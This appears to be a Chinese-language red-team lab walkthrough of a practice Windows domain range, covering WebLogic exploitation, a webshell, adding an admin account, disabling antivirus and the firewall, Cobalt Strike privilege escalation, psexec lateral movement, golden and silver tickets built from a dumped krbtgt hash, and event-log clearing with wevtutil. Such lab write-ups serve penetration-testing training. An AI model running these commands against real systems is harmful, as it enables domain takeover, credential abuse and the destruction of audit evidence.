靶机介绍
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码:1qaz@WSX
- Bypass UAC
- Windows系统NTLM获取(理论知识:Windows认证)
- Access Token利用(MSSQL利用)
- WMI利用
- 网页代理,二层代理,特殊协议代理(DNS,ICMP)
- 域内信息收集
- 域漏洞利用:SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用
- 域凭证收集
- 后门技术(黄金票据/白银票据/Sid History/MOF)
环境搭建
网络拓扑:
- 环境说明
内网网段:10.10.10.1/24
DMZ网段:192.168.111.1/24
防火墙策略(策略设置过后,测试机只能访问192段地址,模拟公网访问):
deny all tcp ports:10.10.10.1
allow all tcp ports:10.10.10.0/24
web主机登录使用de1ay用户登录密码是1qaz@WSX,如果需要管理登录的操作就使用这个账户:administrator/1qaz@WSX
DC
IP:10.10.10.10
OS:Windows 2012(64)
应用:AD域
WEB
IP1:10.10.10.80
IP2:192.168.111.80
OS:Windows 2008(64)
应用:Weblogic 10.3.6MSSQL 2008
注意:在登录时,点击其它用户登录,使用de1ay用户登录密码是1qaz@WSX ,如果要登录管理员账号,用户名是DE1AY\Administrator 1qaz@WSX
开启weblogic:C:\Oracle\Middleware\user_projects\domains\base_domain
右键使用管理员才能进去administrator/1qaz@WSX
查看端口开启情况:
PC
IP1:10.10.10.201
IP2:192.168.111.201
OS:Windows 7(32)
如果出现下图所示,登录账号:administrator 密码为:1qaz@WSX
攻击机
IP:192.168.111.1 OS:Windows 10(64)
IP:192.168.111.11 OS:Parrot(64)
Web打点
信息收集
端口扫描:
nmap -sS -sV -Pn 192.168.111.80
网站端口:80、7001(weblogic)
数据库端口:3306
再扫描一下80端口的目录:
没什么有价值的东西
接着去访问了80端口和7001端口,没有收获。
使用Goby漏扫:
扫出来很多漏洞。
weblogic漏洞利用
扫描出多个漏洞,再接着使用weblogic利用工具来探测一下:
命令执行成功:
注入内存马,然后用蚁剑连接,主要因为这个工具使用起来不是很方便,而且shell不是很稳定,因为目标主机有某数字安全卫士:
蚁剑根据设置连接就行
成功连接:
查看一下进程,发现对方安装了360:
shell tasklist /svc
必须要关闭这个杀软
干掉杀软
有下面几步:
一、 3389上去直接关闭,需要创建管理员用户(因为3306端口是开放的)
二、 提权到system关闭
三、 对c2做免杀
创建用户:
net user itchen 1safddsa@ /add
net localgroup Administrators itchen /add
登录成功,直接卸载某数字:
还可以直接重置administrator用户的密码
net user Administrator test@WSX
博主就不测试了,应该是可以的
内网渗透
信息收集
上传cs木马,执行:
成功上线:
CS提权:
选择ms14-058成功提权
关闭防火墙:
shell netsh advfirewall show all state //查看防火墙状态
shell netsh advfirewall set allprofile state off //关闭防火墙
关闭防火墙成功。
是否存在域
shell net config Workstation
存在域环境
查看有几个域环境
shell net view /domain
报错了,也不知道什么情况,也懒得管了
查看域控
shell net group "domain controllers" /domain
域控:DC
查看域内其他主机名
net group "domain computers" /domain
其他2台机器:PC 、WEB
查看域内主机
net view
不知道什么情况,扫不出来,服了。。。
使用CS自带的arp扫描:
成功把其他2台主机扫描出来了:
查看域内所有用户
shell net user /domain
查看域管理员列表:
shell net group "domain admins" /domain
抓取明文密码
拿到system权限之后,右键抓取明文密码:
端口扫描
直接用CS的端口扫描:
总结:
10-DC: 135,139,88,53,3389,445
201-PC: 135,139,3389,445
横向渗透
psexec横向
通过信息收集,发现DC和PC主机的445端口都是开放的,可以使用psexec横向。
创建smb监听器:
可以直接在CS输入命令:
rev2self
make_token de1ay.com\Administrator 1qaz@WSX
jump psexec PC smb
也可以选中目标,右键psexec:
成功上线,拿下域控:
同样的方法,拿下PC机:
至此3台主机已经全部拿下:
域控和PC好像都装了某数字安全卫士,拿到权限后可以去卸载,按照上面的方法去尝试,远程桌面什么的。博主就不演示了。
权限维持
黄金票据
从DC中hashdump
出krbtgt
的hash值,krbtgt
用户是域中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:82dfc71b72a11ef37d663047bc2088fb:::
在DC查看域的sid
:
S-1-5-21-2756371121-2868759905-3853650604-1001
生成黄金票据:
在WEB主机
上选中右键生成黄金票据
直接远程连接dir域控c盘成功:
shell dir \\10.10.10.10\c$
白银票据
类似低等一点的白银票据,也是要获取sid和 hash值
S-1-5-21-2756371121-2868759905-3853650604-1001
161cff084477fe596a5db81874498a24
cs中填入:
票据生成成功:
黄金票据和白银票据最后都是这一步,访问域控的c盘
shell dir \\10.10.10.10\c$
痕迹清理
主要清理weblogic的日志, 用户等创建可以使用隐藏方式创建,痕迹清理也就是原路返回,看看你都做了什么操作。
1.有远程桌面权限时手动删除日志:
开始-程序-管理工具-计算机管理-系统工具-事件查看器-清除日志
2.wevtutil:
wevtutil el 列出系统中所有日志名称
wevtutil cl system 清理系统日志
wevtutil cl application 清理应用程序日志
wevtutil cl security 清理安全日志
3.meterperter自带清除日志功能:
clearev 清除windows中的应用程序日志、系统日志、安全日志
4.清除recent:
在文件资源管理器中点击“查看”->“选项”->在常规->隐私中点击”清除”按钮或直接打开C:\Users\Administrator\Recent并删除所有内容或在命令行中输入del /f /s /q “%userprofile%\Recent .
总结
- weblogic漏洞利用
- 如何关闭杀软-远程登录直接卸载等等
- psexec横向
- 黄金票据和白银票据